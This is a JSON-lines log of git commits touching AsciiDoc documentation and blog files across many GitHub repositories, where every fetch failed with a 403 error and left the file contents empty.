{"commit":"cf72339cfcebd5ea4aaad7811ca406aac14c8f39","subject":"Added more references","message":"Added more references\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"243930e40277c7fc22f98a02e7236bac86502311","subject":"Add quote markup views","message":"Add quote markup views\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-quoteMarkupViews.adoc","new_file":"src\/main\/docs\/common-quoteMarkupViews.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f565d615ad22cbfa0a029fad48b6e454c7ddeb8","subject":"Create do-always-respond-fil.adoc","message":"Create do-always-respond-fil.adoc\n\nFilipino translation for do-always-respond.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-always-respond-fil.adoc","new_file":"src\/do\/do-always-respond-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a9eb089075db782d6204a73d83a9f30ea797201","subject":"CAMEL-13027 - Added docs","message":"CAMEL-13027 - Added docs\n","repos":"kevinearls\/camel,objectiser\/camel,pmoerenhout\/camel,DariusX\/camel,adessaigne\/camel,tadayosi\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,christophd\/camel,alvinkwekel\/camel,christophd\/camel,gnodet\/camel,nicolaferraro\/camel,gnodet\/camel,cunningt\/camel,alvinkwekel\/camel,tadayosi\/camel,mcollovati\/camel,tadayosi\/camel,pmoerenhout\/camel,cunningt\/camel,CodeSmell\/camel,cunningt\/camel,Fabryprog\/camel,adessaigne\/camel,apache\/camel,punkhorn\/camel-upstream,apache\/camel,pax95\/camel,tdiesler\/camel,tadayosi\/camel,gnodet\/camel,christophd\/camel,kevinearls\/camel,nicolaferraro\/camel,kevinearls\/camel,ullgren\/camel,tdiesler\/camel,alvinkwekel\/camel,zregvart\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,tdiesler\/camel,davidkarlsen\/camel,kevinearls\/camel,nikhilvibhav\/camel,ullgren\/camel,kevinearls\/camel,ullgren\/camel,apache\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,mcollovati\/camel,adessaigne\/camel,christophd\/camel,adessaigne\/camel,pmoerenhout\/camel,DariusX\/camel,zregvart\/camel,davidkarlsen\/camel,christophd\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,gnodet\/camel,cunningt\/camel,cunningt\/camel,pmoerenhout\/camel,tdiesler\/camel,nikhilvibhav\/camel,gnodet\/camel,Fabryprog\/camel,ullgren\/camel,pax95\/camel,tadayosi\/camel,mcollovati\/camel,tdiesler\/camel,zregvart\/camel,punkhorn\/camel-upstream,DariusX\/camel,nicolaferraro\/camel,pax95\/camel,objectiser\/camel,zregvart\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,cunningt\/camel,adessaigne\/camel,objectiser\/camel,Fabryprog\/camel,CodeSmell\/camel,christophd\/camel,apache\/camel,pax95\/camel,tadayosi\/camel,CodeSmell\/camel,kevinearls\/camel,mcollovati\/camel,objectiser\/camel,apache\/camel,pax95\/camel,adessaigne\/camel,tdiesler\/camel,DariusX\/camel,davidkarlsen\/camel,apache\/camel,pmoerenhout\/camel","old_file":"components\/camel-aws\/src\/main\/docs\/aws-eks-component.adoc","new_file":"components\/camel-aws\/src\/main\/docs\/aws-eks-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"95b0b30267d64255a524b3160941928cd74da353","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6e6b26b1109c3c2aa1316dcdb136fcfc9230329","subject":"CL: Add reading\/slurping file","message":"CL: Add reading\/slurping file\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e0c7212ac10e9917696499aad18e6807ba548657","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b47a92dcc013b915037cd63703305a4dce44f39","subject":"Update 2016-04-05-Local-File-Inclusion.adoc","message":"Update 2016-04-05-Local-File-Inclusion.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fffc149d79604a6708e8489a6db978b2bf678962","subject":"Update 2016-11-05-Saturday-Morning.adoc","message":"Update 2016-11-05-Saturday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Saturday-Morning.adoc","new_file":"_posts\/2016-11-05-Saturday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"335562294bc7feb2f38d69fbfb6d3ce343302c39","subject":"y2b create post Giveaway: Google Edition HTC One or Galaxy S4!","message":"y2b create post Giveaway: Google Edition HTC One or Galaxy S4!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-18-Giveaway-Google-Edition-HTC-One-or-Galaxy-S4.adoc","new_file":"_posts\/2013-07-18-Giveaway-Google-Edition-HTC-One-or-Galaxy-S4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb7a0aef3b62e8cefa1e6a30db9254b6ef52f0b3","subject":"y2b create post This Trick Lets YouTube Play In The Background!","message":"y2b create post This Trick Lets YouTube Play In The Background!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-07-This-Trick-Lets-YouTube-Play-In-The-Background.adoc","new_file":"_posts\/2016-08-07-This-Trick-Lets-YouTube-Play-In-The-Background.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0ee9f5bcbc7e42de36e72c472ad77153e735b6d","subject":"Initial readme file","message":"Initial readme file\n","repos":"JacobAae\/spock-workshop","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JacobAae\/spock-workshop.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"ce6fd4d9bf095226fab8ea2690ce1c94b542b90f","subject":"CAMEL-11497 - add from-eip by manually formatting adoc which is taken by cxf-web export","message":"CAMEL-11497 - add from-eip by manually formatting adoc which is taken by cxf-web export\n","repos":"tdiesler\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,DariusX\/camel,cunningt\/camel,nicolaferraro\/camel,gnodet\/camel,adessaigne\/camel,christophd\/camel,jonmcewen\/camel,snurmine\/camel,jamesnetherton\/camel,davidkarlsen\/camel,objectiser\/camel,onders86\/camel,nikhilvibhav\/camel,onders86\/camel,jonmcewen\/camel,dmvolod\/camel,jamesnetherton\/camel,christophd\/camel,jonmcewen\/camel,dmvolod\/camel,anoordover\/camel,tadayosi\/camel,alvinkwekel\/camel,snurmine\/camel,CodeSmell\/camel,curso007\/camel,jamesnetherton\/camel,tadayosi\/camel,sverkera\/camel,pax95\/camel,curso007\/camel,curso007\/camel,rmarting\/camel,anoordover\/camel,DariusX\/camel,zregvart\/camel,nicolaferraro\/camel,mcollovati\/camel,apache\/camel,pax95\/camel,onders86\/camel,davidkarlsen\/camel,gautric\/camel,kevinearls\/camel,gnodet\/camel,zregvart\/camel,alvinkwekel\/camel,pmoerenhout\/camel,tadayosi\/camel,nikhilvibhav\/camel,akhettar\/camel,pmoerenhout\/camel,rmarting\/camel,pax95\/camel,ullgren\/camel,davidkarlsen\/camel,nicolaferraro\/camel,kevinearls\/camel,dmvolod\/camel,Fabryprog\/camel,adessaigne\/camel,mcollovati\/camel,gnodet\/camel,curso007\/camel,sverkera\/camel,jonmcewen\/camel,anoordover\/camel,adessaigne\/camel,akhettar\/camel,CodeSmell\/camel,gautric\/camel,anoordover\/camel,objectiser\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,akhettar\/camel,snurmine\/camel,zregvart\/camel,cunningt\/camel,jonmcewen\/camel,cunningt\/camel,sverkera\/camel,adessaigne\/camel,kevinearls\/camel,akhettar\/camel,anoordover\/camel,mcollovati\/camel,nikhilvibhav\/camel,dmvolod\/camel,snurmine\/camel,apache\/camel,Fabryprog\/camel,christophd\/camel,Fabryprog\/camel,gnodet\/camel,tdiesler\/camel,pmoerenhout\/camel,akhettar\/camel,christophd\/camel,pmoerenhout\/camel,Fabryprog\/camel,kevinearls\/camel,dmvolod\/camel,apache\/camel,apache\/camel,CodeSmell\/camel,gautric\/camel,pax95\/camel,ullgren\/camel,dmvolod\/camel,CodeSmell\/camel,snurmine\/camel,jamesnetherton\/camel,christophd\/camel,jamesnetherton\/camel,DariusX\/camel,ullgren\/camel,apache\/camel,kevinearls\/camel,tdiesler\/camel,tadayosi\/camel,mcollovati\/camel,cunningt\/camel,alvinkwekel\/camel,adessaigne\/camel,onders86\/camel,pax95\/camel,pmoerenhout\/camel,tadayosi\/camel,alvinkwekel\/camel,objectiser\/camel,rmarting\/camel,nikhilvibhav\/camel,gnodet\/camel,nicolaferraro\/camel,gautric\/camel,tdiesler\/camel,cunningt\/camel,gautric\/camel,sverkera\/camel,onders86\/camel,sverkera\/camel,jamesnetherton\/camel,objectiser\/camel,rmarting\/camel,sverkera\/camel,akhettar\/camel,cunningt\/camel,adessaigne\/camel,kevinearls\/camel,rmarting\/camel,rmarting\/camel,anoordover\/camel,jonmcewen\/camel,zregvart\/camel,ullgren\/camel,onders86\/camel,pax95\/camel,curso007\/camel,tdiesler\/camel,pmoerenhout\/camel,snurmine\/camel,curso007\/camel,gautric\/camel,christophd\/camel,apache\/camel,tdiesler\/camel,DariusX\/camel,tadayosi\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/from-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/from-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4462484296c83324d1f67e6225dea85caab494d4","subject":"Update 2015-09-21-MasterCard-Moments-Priceless-Cities.adoc","message":"Update 2015-09-21-MasterCard-Moments-Priceless-Cities.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-21-MasterCard-Moments-Priceless-Cities.adoc","new_file":"_posts\/2015-09-21-MasterCard-Moments-Priceless-Cities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f919266ae650d9b87944659eb4714a0116422ff6","subject":"Update 2018-05-07-try-gas-with-slack.adoc","message":"Update 2018-05-07-try-gas-with-slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd83a315fd439d1b1a02f10f461d66734359207f","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3755e8144ac239a7c121f7686d7cb655bf7f0fb6","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f731a01f5e451e7b99a43181a053d6d68d9d7381","subject":"Update 2017-06-22-Your-Blog-title.adoc","message":"Update 2017-06-22-Your-Blog-title.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-06-22-Your-Blog-title.adoc","new_file":"_posts\/2017-06-22-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a01fa62baf83eafb1db77ddce312bd80b25050e","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fff6d5b33acf7492dbe28299bbcaff97021b45b2","subject":"Update 2019-01-31-Mon-premier-article-test.adoc","message":"Update 2019-01-31-Mon-premier-article-test.adoc","repos":"pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io","old_file":"_posts\/2019-01-31-Mon-premier-article-test.adoc","new_file":"_posts\/2019-01-31-Mon-premier-article-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pamasse\/pamasse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ed521cd6efd07edf226ea73a9832bb6e5363ff4","subject":"add glossary of LD2 terminology","message":"add glossary of LD2 terminology\n","repos":"Drakojin\/livingdoc2,pkleimann\/livingdoc,pkleimann\/livingdoc2,LivingDoc\/livingdoc,pkleimann\/livingdoc,pkleimann\/livingdoc,pkleimann\/livingdoc2,testIT-LivingDoc\/livingdoc2,bitterblue\/livingdoc2,bitterblue\/livingdoc2,Drakojin\/livingdoc2,LivingDoc\/livingdoc,LivingDoc\/livingdoc,testIT-LivingDoc\/livingdoc2,Drakojin\/livingdoc2,bitterblue\/livingdoc2","old_file":"doc\/glossary.adoc","new_file":"doc\/glossary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitterblue\/livingdoc2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1109ff3bdc04cfb708b5c49300c2d3b7deeac596","subject":"Update 2016-12-08-My-Development-Environment-Setup.adoc","message":"Update 2016-12-08-My-Development-Environment-Setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca86bedf27b179545af14c5b94cc188599a0968d","subject":"y2b create post The Fidget Spinner Phone Is Real...","message":"y2b create post The Fidget Spinner Phone Is Real...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-13-The-Fidget-Spinner-Phone-Is-Real.adoc","new_file":"_posts\/2017-10-13-The-Fidget-Spinner-Phone-Is-Real.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b568744979e9deb1151fffed1ad63dc02f1f3806","subject":"y2b create post The Best Headphones That Money Can Buy...","message":"y2b create post The Best Headphones That Money Can Buy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-13-TheBestHeadphonesThatMoneyCanBuy.adoc","new_file":"_posts\/2018-01-13-TheBestHeadphonesThatMoneyCanBuy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55c809d3cc763d9145c51ed1abba16dbfa68e14e","subject":"Release announcement for BTM 0.6.0.Final","message":"Release announcement for BTM 0.6.0.Final\n","repos":"tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/11\/30\/hawkular-btm-0-6-0-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/11\/30\/hawkular-btm-0-6-0-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"621bbce4bb63744095fd516f6d46482b8ca2538a","subject":"DBZ-361 Adding note on provided Compose files","message":"DBZ-361 Adding note on provided Compose files\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"docs\/tutorial.asciidoc","new_file":"docs\/tutorial.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e824972ef8820d309a51df4ee035834b55bb888a","subject":"Update 2016-07-15-Mi-primer-blog.adoc","message":"Update 2016-07-15-Mi-primer-blog.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2016-07-15-Mi-primer-blog.adoc","new_file":"_posts\/2016-07-15-Mi-primer-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49c8d878b6549467956c3a2aee5bfc4fcf9bdd8a","subject":"y2b create post This Cool iPhone Gadget","message":"y2b create post This Cool iPhone Gadget","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-09-This-Cool-iPhone-Gadget.adoc","new_file":"_posts\/2016-06-09-This-Cool-iPhone-Gadget.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a04b253d41f8fdc2aa7257f417d5febc39887a6a","subject":"y2b create post They Call It The Fourza...","message":"y2b create post They Call It The Fourza...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-23-They-Call-It-The-Fourza.adoc","new_file":"_posts\/2016-09-23-They-Call-It-The-Fourza.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87384d658692e6411013e89ef4636722d6c8ba76","subject":"Publish DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","message":"Publish DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","new_file":"DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c477dd6635d838ac6f26bb33285164b92d49d2c8","subject":"y2b create post The Unboxing Time Machine - iPod Mini","message":"y2b create post The Unboxing Time Machine - iPod Mini","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-15-The-Unboxing-Time-Machine--iPod-Mini.adoc","new_file":"_posts\/2016-11-15-The-Unboxing-Time-Machine--iPod-Mini.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3e0c535cfcf56b1b201982bf7d542f5feb6ff0a","subject":"Update 2018-02-13-android-with-google-cloud-vision-api.adoc","message":"Update 2018-02-13-android-with-google-cloud-vision-api.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-13-android-with-google-cloud-vision-api.adoc","new_file":"_posts\/2018-02-13-android-with-google-cloud-vision-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f26af8c8cd1c525b9800b22fe60127d4943aa502","subject":"y2b create post IPHONE 4S HUGE LINE (Apple Store Lineup) Launch Day","message":"y2b create post IPHONE 4S HUGE LINE (Apple Store Lineup) Launch Day","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-13-IPHONE-4S-HUGE-LINE-Apple-Store-Lineup-Launch-Day.adoc","new_file":"_posts\/2011-10-13-IPHONE-4S-HUGE-LINE-Apple-Store-Lineup-Launch-Day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25e9afe1263961f6381813974fbc7d4d9a8a9641","subject":"new API documentation landing page","message":"new API documentation landing page\n","repos":"sw360\/sw360rest,sw360\/sw360rest,sw360\/sw360rest,sw360\/sw360rest","old_file":"subprojects\/resource-server\/src\/docs\/asciidoc\/api.adoc","new_file":"subprojects\/resource-server\/src\/docs\/asciidoc\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sw360\/sw360rest.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"09d3f0bafead626745028c23248b891e3fe3f48b","subject":"Common snippet - Grails default package","message":"Common snippet - Grails default package\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-defaultPackage.adoc","new_file":"src\/main\/docs\/common-defaultPackage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d5397e17aa99e2d3be41b94db03050310781bef","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"489ba0247055368e387328c749bc9a0d272b530f","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95117c1780b4304797c86c6e71a6ba77454ee04b","subject":"Update 